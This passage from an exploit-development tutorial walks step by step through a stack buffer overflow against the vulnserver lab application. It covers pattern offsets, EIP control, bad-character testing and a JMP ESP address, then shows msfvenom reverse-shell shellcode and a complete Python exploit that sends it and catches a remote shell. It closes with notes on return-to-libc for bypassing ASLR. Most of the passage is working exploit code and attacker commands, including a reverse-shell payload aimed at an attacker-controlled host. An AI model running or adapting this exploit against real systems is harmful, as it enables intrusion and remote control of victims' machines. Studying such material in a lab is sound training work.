By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7
Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2C
d3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8C
f9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4C
i5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3
Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7
Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq
2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8
Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4
Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8
Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da
4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc
8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df
2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6D
h7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3D
k4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7D
m8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0D
p1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4
Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du
0Du1Du2Du3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9Dw0Dw1Dw2Dw3
Dw4Dw5Dw6Dw7Dw8Dw9Dx0Dx1Dx2Dx3Dx4Dx5Dx6Dx7Dx8Dx9Dy0Dy1Dy2Dy3Dy4Dy5Dy6D
y7Dy8Dy9Dz0Dz1Dz2Dz3Dz4Dz5Dz6Dz7Dz8Dz9Ea0Ea1Ea2Ea3Ea4Ea5Ea6Ea7Ea8Ea9Eb0Eb1Eb2
Eb3Eb4Eb5Eb6Eb7Eb8Eb9Ec0Ec1Ec2Ec3Ec4Ec5Ec6Ec7Ec8Ec9Ed0Ed1Ed2Ed3Ed4Ed5Ed6Ed7Ed8
Ed9Ee0Ee1Ee2Ee3Ee4Ee5Ee6Ee7Ee8Ee9Ef0Ef1Ef2Ef3Ef4Ef5Ef6Ef7Ef8Ef9Eg0Eg1Eg2Eg3Eg4Eg5
Eg6Eg7Eg8Eg9Eh0Eh1Eh2Eh3Eh4Eh5Eh6Eh7Eh8Eh9Ei0Ei1Ei2Ei3Ei4Ei5Ei6Ei7Ei8Ei9Ej0Ej1Ej2Ej3
Ej4Ej5Ej6Ej7Ej8Ej9Ek0Ek1Ek2Ek3Ek4Ek5Ek6Ek7Ek8Ek9El0El1El2El3El4El5El6El7El8El9Em0Em1E
m2Em3Em4Em5Em6Em7Em8Em9En0En1En2En3En4En5En6En7En8En9Eo0Eo1Eo2Eo3Eo4Eo5
Eo6Eo7Eo8Eo9Ep0Ep1Ep2Ep3Ep4Ep5Ep6Ep7Ep8Ep9Eq0Eq1Eq2Eq3Eq4Eq5Eq6Eq7Eq8Eq9Er0E
r1Er2Er3Er4Er5Er6Er7Er8Er9Es0Es1Es2Es3Es4Es5Es6Es7Es8Es9Et0Et1Et2Et3Et4Et5Et6Et7Et8Et
9Eu0Eu1Eu2Eu3Eu4Eu5Eu6Eu7Eu8Eu9Ev0Ev1Ev2Ev3Ev4Ev5Ev6Ev7Ev8Ev9Ew0Ew1Ew2Ew3Ew
4Ew5Ew6Ew7Ew8Ew9Ex0Ex1Ex2Ex3Ex4Ex5Ex6Ex7Ex8Ex9Ey0Ey1Ey2Ey3Ey4Ey5Ey6Ey7Ey8Ey9E
z0Ez1Ez2Ez3Ez4Ez5Ez6Ez7Ez8Ez9Fa0Fa1Fa2Fa3Fa4Fa5Fa6Fa7Fa8Fa9Fb0Fb1Fb2Fb3Fb4Fb5Fb6
Fb7Fb8Fb9Fc0Fc1Fc2Fc3Fc4Fc5Fc6Fc7Fc8Fc9Fd0Fd1Fd2Fd3Fd4Fd5Fd6Fd7Fd8Fd9Fe0Fe1Fe2Fe
3Fe4Fe5Fe6Fe7Fe8Fe9Ff0Ff1Ff2Ff3Ff4Ff5Ff6Ff7Ff8Ff9Fg0Fg1Fg2Fg3Fg4Fg5Fg6Fg7Fg8Fg9Fh0F
h1Fh2Fh3Fh4Fh5Fh6Fh7Fh8Fh9Fi0Fi1Fi2Fi3Fi4Fi5Fi6Fi7Fi8Fi9Fj0Fj1Fj2Fj3Fj4Fj5Fj6Fj7Fj8Fj9Fk0
Fk1Fk2Fk3Fk4Fk5Fk6Fk7Fk8Fk9Fl0Fl1Fl2Fl3Fl4Fl5Fl6Fl7Fl8Fl9Fm0Fm1Fm2Fm3Fm4Fm5Fm6Fm
7Fm8Fm9Fn0Fn1Fn2Fn3Fn4Fn5Fn6Fn7Fn8Fn9Fo0Fo1Fo2Fo3Fo4Fo5Fo6Fo7Fo8Fo9Fp0Fp1Fp2
Fp3Fp4Fp5Fp6Fp7Fp8Fp9Fq0Fq1Fq2Fq3Fq4Fq5Fq6Fq7Fq8Fq9Fr0Fr1Fr2Fr3Fr4Fr5Fr6Fr7Fr8Fr9
Fs0Fs1Fs2Fs3Fs4Fs5Fs6Fs7Fs8Fs9Ft0Ft1Ft2Ft3Ft4Ft5Ft6Ft7Ft8Ft9Fu0Fu1Fu2Fu3Fu4Fu5Fu6Fu7
Fu8Fu9Fv0Fv1Fv2Fv3Fv4Fv5Fv6Fv7Fv8Fv9Fw0Fw1Fw2Fw3Fw4Fw5Fw6Fw7Fw8Fw9Fx0Fx1Fx2F
x3Fx4Fx5Fx6Fx7Fx8Fx9Fy0Fy1Fy2Fy3Fy4Fy5Fy6Fy7Fy8Fy9Fz0Fz1Fz2Fz3Fz4Fz5Fz6Fz7Fz8Fz9Ga
0Ga1Ga2Ga3Ga4Ga5Ga6Ga7Ga8Ga9Gb0Gb1Gb2Gb3Gb4Gb5Gb6Gb7Gb8Gb9Gc0Gc1Gc2Gc3G
c4Gc5Gc6Gc7Gc8Gc9Gd0Gd1Gd2Gd3Gd4Gd5Gd6Gd7Gd8Gd9Ge0Ge1Ge2Ge3Ge4Ge5Ge6Ge7
Ge8Ge9Gf0Gf1Gf2Gf3Gf4Gf5Gf6Gf7Gf8Gf9Gg0Gg1Gg2Gg3Gg4Gg5Gg6Gg7Gg8Gg9Gh0Gh1Gh
2Gh3Gh4Gh5Gh6Gh7Gh8Gh9Gi0Gi1Gi2Gi3Gi4Gi5Gi6Gi7Gi8Gi9Gj0Gj1Gj2Gj3Gj4Gj5Gj6Gj7Gj8
Gj9Gk0Gk1Gk2Gk3Gk4Gk5Gk6Gk7Gk8Gk9G"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,port))
print s.recv(1024)
s.send(buffer)
print s.recv(1024)
s.close()
(FYI, if you want to learn about socket() and connect() function calls, see my SLAE x86 posts
where we create bind and reverse TCP shells in Assembly:)
• Bind TCP
• Reverse TCP
Let’s run vulnserver through Immunity once more and see how our exploit crashes the
application.
Excellent, we now have a location in our string where we know EIP is overwritten. We can feed
this sequence of bytes to Mona and she will do the hard work for us of finding the exact offset
where this sequence occurs in our pattern.txt file we pasted into our exploit.py. We can use
the following command: !mona po 6F43376F
Running this command with Mona yields the following result: - Pattern o7Co (0x6F43376F)
found in cyclic pattern at position 2002
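To see what Mona is doing here, the lookup can be reproduced in a few lines. This is a minimal Python 3 sketch under assumptions: the helper names cyclic_pattern and pattern_offset are my own, and the generator simply rebuilds the Aa0Aa1Aa2... layout visible in the pattern above rather than calling Mona or Metasploit.

```python
import string
import struct


def cyclic_pattern(length):
    """Build the Aa0Aa1Aa2... pattern (upper, lower, digit triples)."""
    out = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out.append(upper + lower + digit)
                if len(out) * 3 >= length:
                    return "".join(out)[:length]
    return "".join(out)[:length]


def pattern_offset(eip_value, length):
    """Return the position of the 4 bytes found in EIP, or -1 if absent."""
    # EIP is read as a little-endian integer, so unpack it back into the
    # byte order in which the characters sat in memory.
    needle = struct.pack("<I", eip_value).decode("latin-1")
    return cyclic_pattern(length).find(needle)


if __name__ == "__main__":
    print(pattern_offset(0x6F43376F, 5011))
```

The value 0x6F43376F unpacks to the characters o7Co, which is the same substring Mona reports.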
So we now have our offset: 2002 bytes. The offset is essentially how far into our fuzzing string
the EIP overwrite occurs. Our string that we submitted looks like this:
Controlling EIP
What we want to do now is to verify that our offset is correct. This might seem like a painful
process, but approaching buffer overflow exploit development in a methodical way like this,
checking each step, is how we avoid skipping a step and puzzling over our completed exploit
which doesn’t actually exploit anything. We want to chop those 3 sections identified above
into 3 distinct character sets to assess whether or not they actually align as we imagine. We
want the following distinction:
• 2002 bytes: A or 41
• 4 bytes: B or 42
• remainder of string: C or 43
#!/usr/bin/python
import socket
import os
import sys
host = "192.168.1.201"
port = 9999
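buffer = "TRUN /.:/"
buffer += "A" * 2002  # filler up to the offset
buffer += "B" * 4  # these 4 bytes should land in EIP
buffer += "C" * (5011 - 2002 - 4)  # remainder of the string
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,port))
print s.recv(1024)
s.send(buffer)
print s.recv(1024)
s.close()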
Running this exploit against our Immunity-attached vulnserver should net us an EIP value
of 42424242 since we should be overwriting the value with our B’s.
As you can see, we have successfully controlled EIP and ESP is pointing towards our C’s on the
stack.
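The layout being verified here can also be checked offline before anything is sent. The following is a Python 3 sketch under assumptions: build_test_buffer is a hypothetical helper, and the constants are the prefix, offset and total length quoted in this walkthrough.

```python
import struct

PREFIX = b"TRUN /.:/"   # command prefix taken from the fuzzing results
OFFSET = 2002           # offset reported by Mona
TOTAL = 5011            # size of the original fuzz string


def build_test_buffer(offset=OFFSET, total=TOTAL):
    """Return prefix + A*offset + BBBB + C*remainder."""
    body = b"A" * offset + b"B" * 4
    body += b"C" * (total - len(body))
    return PREFIX + body


if __name__ == "__main__":
    buf = build_test_buffer()
    body = buf[len(PREFIX):]
    # The 4 bytes at the offset are what we expect to see in EIP.
    eip = struct.unpack("<I", body[OFFSET:OFFSET + 4])[0]
    print(hex(eip), len(body))
```

If the value printed here is 0x42424242 but the debugger shows something else, the offset is off by a few bytes and should be rechecked before moving on.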
At this point in the exploit development process, we want to determine if our application,
vulnserver, will misinterpret any hex characters that may end up in our shellcode. Remember
that we control EIP which tells the program the address of the next instruction to execute.
Since we can place arbitrary values onto the stack (we’ve already done so with our C’s), which
is pointed to by ESP, we can place our malicious payload on the stack and then have EIP point
to ESP which would execute our shellcode.
To search for bad characters, we will replace our C values with every possible byte value
(\x00 through \xff) and see which ones do not show up in the hex dump in Immunity once the
application crashes. Mona to the rescue once again! Feeding Mona the instruction
!mona bytearray will produce a string of every byte value for us to paste into our exploit.
Our exploit.py should now look like this:
#!/usr/bin/python
import socket
import os
import sys
host = "192.168.1.201"
port = 9999
badchars = (
"\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f"
"\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f"
"\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f"
"\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f"
"\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f"
"\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf"
"\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf"
"\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")
buffer = "TRUN /.:/"
buffer += "A" * 2002
buffer += "B" * 4
buffer += badchars
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,port))
print s.recv(1024)
s.send(buffer)
print s.recv(1024)
s.close()
The tell-tale sign of a bad character will be that the otherwise perfect sequence of
characters in the hex dump is broken. When we run this exploit against vulnserver, wait for
the application to crash, then right-click ESP and select Follow in Dump, we are presented
with the following pane:
I do not see our sequence of characters anywhere. This could mean that our very first
character, \x00, is in fact a bad character. \x00 is known as a NULL byte and we know from
experience in SLAE that we want to avoid NULL bytes in our shellcode. Let’s remove \x00 from
our payload and see if this fixes anything as we repeat the process.
#!/usr/bin/python
import socket
import os
import sys
host = "192.168.1.201"
port = 9999
badchars = (
"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f"
"\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f"
"\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f"
"\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f"
"\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f"
"\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf"
"\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf"
"\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")
buffer = "TRUN /.:/"
buffer += "A" * 2002
buffer += "B" * 4
buffer += badchars
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,port))
print s.recv(1024)
s.send(buffer)
print s.recv(1024)
s.close()
We are now presented with the following
pane:
As you can see, our entire sequence is presented unbroken. We have determined that \x00 is
our only bad character. This will likely not be the case very often and you must rigorously
check for bad characters by iterating through this process until all bad characters are
eliminated.
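The eye test can be backed up with a small comparison once the bytes after ESP have been copied out of the dump. This is a Python 3 sketch under assumptions: candidate_bytes and first_mismatch are hypothetical helpers, and the dumped value in the example is made up to show what a broken sequence looks like.

```python
def candidate_bytes(exclude=b"\x00"):
    """All byte values 0x00-0xff except those already known to be bad."""
    return bytes(b for b in range(256) if b not in exclude)


def first_mismatch(sent, dumped):
    """Return (index, sent_byte) where the dump first diverges, or None."""
    for i, byte in enumerate(sent):
        if i >= len(dumped) or dumped[i] != byte:
            return i, byte
    return None


if __name__ == "__main__":
    sent = candidate_bytes()
    # Hypothetical dump in which 0x0a was mangled and everything after it lost.
    dumped = sent[:9] + b"\x20"
    print(first_mismatch(sent, dumped))
```

Each time a mismatch is reported, the offending byte is added to exclude and the test is repeated until first_mismatch returns None.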
Our last use of Mona will be asking her to find a memory address within the vulnserver
process that holds the instruction JMP ESP. If we are able to place this address into EIP, the
processor will execute the JMP ESP found there as its next instruction, jump to ESP, and
execute whatever instructions are located there, in this case our payload!
But not only do we have to find a JMP ESP instruction, we have to find one that is within a
module that does not have ASLR enabled. ASLR randomizes where modules are loaded each
time the computer reboots, so a hardcoded address inside an ASLR-enabled module stops
being valid and these types of exploits become infeasible. However, programs are not
beholden to strictly use ASLR-enabled, Microsoft-approved modules and often include
non-ASLR modules.
Mona will fetch us what we need with a simple command of: !mona jmp -r esp
We see that Mona found 9 addresses of JMP ESP instructions within vulnserver, and all of
them happen to be in the essfunc.dll file with ASLR disabled (set to False). Let’s use the second
instance, which is at the memory address 0x625011bb.
We can verify this in Immunity by finding this memory location and looking at the opcode for
the address.
• In Immunity, click on the lowercase e at the top of the UI. This will show you the
executable modules for the program.
• We are interested in essfunc.dll since this is where our JMP ESP call lives. Double-click
the essfunc.dll line.
• Right-click in the top left panel, select Search for, select Command, input jmp esp, and
press enter.
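What this check confirms is that the two bytes at the chosen address are FF E4, the opcode for JMP ESP. The search itself is just a byte scan, sketched here in Python 3 under assumptions: find_opcode is a hypothetical helper, and the bytes and base address in the example are made up rather than read from essfunc.dll.

```python
JMP_ESP = b"\xff\xe4"   # opcode bytes for JMP ESP


def find_opcode(blob, base_address, opcode=JMP_ESP):
    """Return the virtual address of every occurrence of `opcode` in `blob`."""
    hits = []
    start = blob.find(opcode)
    while start != -1:
        hits.append(base_address + start)
        start = blob.find(opcode, start + 1)
    return hits


if __name__ == "__main__":
    # Made-up bytes standing in for a module's code section.
    fake_section = b"\x90\x90\xff\xe4\xc3\x55\xff\xe4"
    for address in find_opcode(fake_section, base_address=0x10000000):
        print(hex(address))
```

Mona does considerably more than this (it also reports each module's ASLR and other protection flags), so the sketch only illustrates why several candidate addresses can turn up in one module.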
So we are sure that Mona wasn’t telling us lies. Since x86 is little-endian, we place this
address into the EIP overwrite portion of our payload in reverse byte order, so
that 0x625011bb becomes \xbb\x11\x50\x62 in our payload, which now looks like this:
#!/usr/bin/python
import socket
import os
import sys
host = "192.168.1.201"
port = 9999
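buffer = "TRUN /.:/"
buffer += "A" * 2002
buffer += "\xbb\x11\x50\x62"  # 0x625011bb (JMP ESP in essfunc.dll), little-endian
buffer += "C" * (5011 - 2002 - 4)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,port))
print s.recv(1024)
s.send(buffer)
print s.recv(1024)
s.close()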
Code Execution!
All that’s left for us to do at this point is to replace the value of the stack, currently a bunch
of C values or bad chars depending on your workflow, with our shellcode. We will also want to
prepend some NOPs to our payload so that we increase the surface area so to speak of our
exploitable code and increase the chance of the program flowing to the location of our
shellcode.
We can do this simply by adding a variable called nop to our script with the line
nop = '\x90' * 15.
15 is largely an arbitrary number that I often use for this purpose. The number of NOPs you
use is up to you, but don’t use so many that it drastically eats into your buffer and reduces the
space available for your shellcode.
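The trade-off between NOPs and shellcode space is simple arithmetic. Here is a Python 3 sketch under assumptions: shellcode_room is a hypothetical helper, and it assumes the whole 5011-byte string from the fuzzing step is usable, which may not hold for every target.

```python
def shellcode_room(total, offset, nop_count, ret_size=4):
    """Bytes left for shellcode after the filler, return address and NOPs."""
    return total - offset - ret_size - nop_count


if __name__ == "__main__":
    # Compare a small sled with two much larger ones.
    for nops in (15, 500, 3000):
        print(nops, shellcode_room(total=5011, offset=2002, nop_count=nops))
```

With 15 NOPs almost all of the space after the return address is still free, whereas a sled of a few thousand bytes would leave next to nothing for the payload.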
To generate our payload with msfvenom we use the following command: msfvenom -p
windows/shell_reverse_tcp lhost=192.168.1.199 lport=443 EXITFUNC=thread -b "\x00" -f
c which can be broken down as follows:
• EXITFUNC=thread tells msfvenom to create the payload in such a way that it is run in a
sub-thread of the process helping us to avoid crashing the program and achieving a
smooth exit
"\xdb\xcc\xd9\x74\x24\xf4\x5a\x29\xc9\xb1\x52\xbf\x36\x08\x50"
"\xc1\x31\x7a\x17\x83\xc2\x04\x03\x4c\x1b\xb2\x34\x4c\xf3\xb0"
"\xb7\xac\x04\xd5\x3e\x49\x35\xd5\x25\x1a\x66\xe5\x2e\x4e\x8b"
"\x8e\x63\x7a\x18\xe2\xab\x8d\xa9\x49\x8a\xa0\x2a\xe1\xee\xa3"
"\xa8\xf8\x22\x03\x90\x32\x37\x42\xd5\x2f\xba\x16\x8e\x24\x69"
"\x86\xbb\x71\xb2\x2d\xf7\x94\xb2\xd2\x40\x96\x93\x45\xda\xc1"
"\x33\x64\x0f\x7a\x7a\x7e\x4c\x47\x34\xf5\xa6\x33\xc7\xdf\xf6"
"\xbc\x64\x1e\x37\x4f\x74\x67\xf0\xb0\x03\x91\x02\x4c\x14\x66"
"\x78\x8a\x91\x7c\xda\x59\x01\x58\xda\x8e\xd4\x2b\xd0\x7b\x92"
"\x73\xf5\x7a\x77\x08\x01\xf6\x76\xde\x83\x4c\x5d\xfa\xc8\x17"
"\xfc\x5b\xb5\xf6\x01\xbb\x16\xa6\xa7\xb0\xbb\xb3\xd5\x9b\xd3"
"\x70\xd4\x23\x24\x1f\x6f\x50\x16\x80\xdb\xfe\x1a\x49\xc2\xf9"
"\x5d\x60\xb2\x95\xa3\x8b\xc3\xbc\x67\xdf\x93\xd6\x4e\x60\x78"
"\x26\x6e\xb5\x2f\x76\xc0\x66\x90\x26\xa0\xd6\x78\x2c\x2f\x08"
"\x98\x4f\xe5\x21\x33\xaa\x6e\x8e\x6c\xb5\xa9\x66\x6f\xb5\x34"
"\xcc\xe6\x53\x5c\x22\xaf\xcc\xc9\xdb\xea\x86\x68\x23\x21\xe3"
"\xab\xaf\xc6\x14\x65\x58\xa2\x06\x12\xa8\xf9\x74\xb5\xb7\xd7"
"\x10\x59\x25\xbc\xe0\x14\x56\x6b\xb7\x71\xa8\x62\x5d\x6c\x93"
"\xdc\x43\x6d\x45\x26\xc7\xaa\xb6\xa9\xc6\x3f\x82\x8d\xd8\xf9"
"\x0b\x8a\x8c\x55\x5a\x44\x7a\x10\x34\x26\xd4\xca\xeb\xe0\xb0"
"\x8b\xc7\x32\xc6\x93\x0d\xc5\x26\x25\xf8\x90\x59\x8a\x6c\x15"
"\x22\xf6\x0c\xda\xf9\xb2\x2d\x39\x2b\xcf\xc5\xe4\xbe\x72\x88"
"\x16\x15\xb0\xb5\x94\x9f\x49\x42\x84\xea\x4c\x0e\x02\x07\x3d"
"\x1f\xe7\x27\x92\x20\x22";
We will add our NOPs and shellcode to our exploit at this point so that our final exploit script
will be:
#!/usr/bin/python
import socket
import os
import sys
host = "192.168.1.201"
port = 9999
nop = "\x90" * 15
shellcode = ("\xdb\xcc\xd9\x74\x24\xf4\x5a\x29\xc9\xb1\x52\xbf\x36\x08\x50"
"\xc1\x31\x7a\x17\x83\xc2\x04\x03\x4c\x1b\xb2\x34\x4c\xf3\xb0"
"\xb7\xac\x04\xd5\x3e\x49\x35\xd5\x25\x1a\x66\xe5\x2e\x4e\x8b"
"\x8e\x63\x7a\x18\xe2\xab\x8d\xa9\x49\x8a\xa0\x2a\xe1\xee\xa3"
"\xa8\xf8\x22\x03\x90\x32\x37\x42\xd5\x2f\xba\x16\x8e\x24\x69"
"\x86\xbb\x71\xb2\x2d\xf7\x94\xb2\xd2\x40\x96\x93\x45\xda\xc1"
"\x33\x64\x0f\x7a\x7a\x7e\x4c\x47\x34\xf5\xa6\x33\xc7\xdf\xf6"
"\xbc\x64\x1e\x37\x4f\x74\x67\xf0\xb0\x03\x91\x02\x4c\x14\x66"
"\x78\x8a\x91\x7c\xda\x59\x01\x58\xda\x8e\xd4\x2b\xd0\x7b\x92"
"\x73\xf5\x7a\x77\x08\x01\xf6\x76\xde\x83\x4c\x5d\xfa\xc8\x17"
"\xfc\x5b\xb5\xf6\x01\xbb\x16\xa6\xa7\xb0\xbb\xb3\xd5\x9b\xd3"
"\x70\xd4\x23\x24\x1f\x6f\x50\x16\x80\xdb\xfe\x1a\x49\xc2\xf9"
"\x5d\x60\xb2\x95\xa3\x8b\xc3\xbc\x67\xdf\x93\xd6\x4e\x60\x78"
"\x26\x6e\xb5\x2f\x76\xc0\x66\x90\x26\xa0\xd6\x78\x2c\x2f\x08"
"\x98\x4f\xe5\x21\x33\xaa\x6e\x8e\x6c\xb5\xa9\x66\x6f\xb5\x34"
"\xcc\xe6\x53\x5c\x22\xaf\xcc\xc9\xdb\xea\x86\x68\x23\x21\xe3"
"\xab\xaf\xc6\x14\x65\x58\xa2\x06\x12\xa8\xf9\x74\xb5\xb7\xd7"
"\x10\x59\x25\xbc\xe0\x14\x56\x6b\xb7\x71\xa8\x62\x5d\x6c\x93"
"\xdc\x43\x6d\x45\x26\xc7\xaa\xb6\xa9\xc6\x3f\x82\x8d\xd8\xf9"
"\x0b\x8a\x8c\x55\x5a\x44\x7a\x10\x34\x26\xd4\xca\xeb\xe0\xb0"
"\x8b\xc7\x32\xc6\x93\x0d\xc5\x26\x25\xf8\x90\x59\x8a\x6c\x15"
"\x22\xf6\x0c\xda\xf9\xb2\x2d\x39\x2b\xcf\xc5\xe4\xbe\x72\x88"
"\x16\x15\xb0\xb5\x94\x9f\x49\x42\x84\xea\x4c\x0e\x02\x07\x3d"
"\x1f\xe7\x27\x92\x20\x22")
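# the vulnserver command prefix found during fuzzing goes in front of the padding
buffer = "A" * 2002              # padding up to the saved return address
buffer += "\xbb\x11\x50\x62"     # EIP overwrite: 0x625011bb in little-endian byte order
buffer += nop                    # NOP sled in front of the shellcode
buffer += shellcode
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,port))
print s.recv(1024)
s.send(buffer)
print s.recv(1024)
s.close()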
If we run this exploit code against vulnserver at this point, our payload executes and we
catch a reverse shell:
C:\Users\IEUser\Desktop>
https://h0mbre.github.io/Boofuzz_to_EIP_Overwrite/#
ASLR Bypass
https://www.ccn-cert.cni.es/pdf/documentos-publicos/xi-jornadas-stic-ccn-cert/2575-m11-06-rockandropeando/file.html
https://www.exploit-db.com/docs/english/17914-bypassing-aslrdep.pdf
ASLR stands for “address space layout randomization”. It is a computer security technique
designed to make memory corruption vulnerabilities, such as buffer overflows, harder to
exploit. In order to prevent an attacker from reliably jumping to a known address, ASLR
randomly arranges the address space positions of key data areas of a process, including the
base of the executable and the positions of the stack, heap and libraries.
When ASLR is enabled, the address of a JMP ESP instruction changes every time we execute
the binary, so we can no longer hard-code that address into EIP to reach our payload.
What is libc?
In very simple language, libc is the standard library for the C programming language. It
provides the predefined functions (for example printf, system and exit) that C programs
import instead of implementing themselves.
So, in the return-to-libc method, instead of giving EIP the address of JMP ESP, we give it the
address of a predefined libc function that runs the command we want to execute.
Instead of executing JMP ESP followed by our shellcode, we point EIP directly at system()
with "/bin/sh" as its argument, which gives us a shell with the privileges of the vulnerable
program.
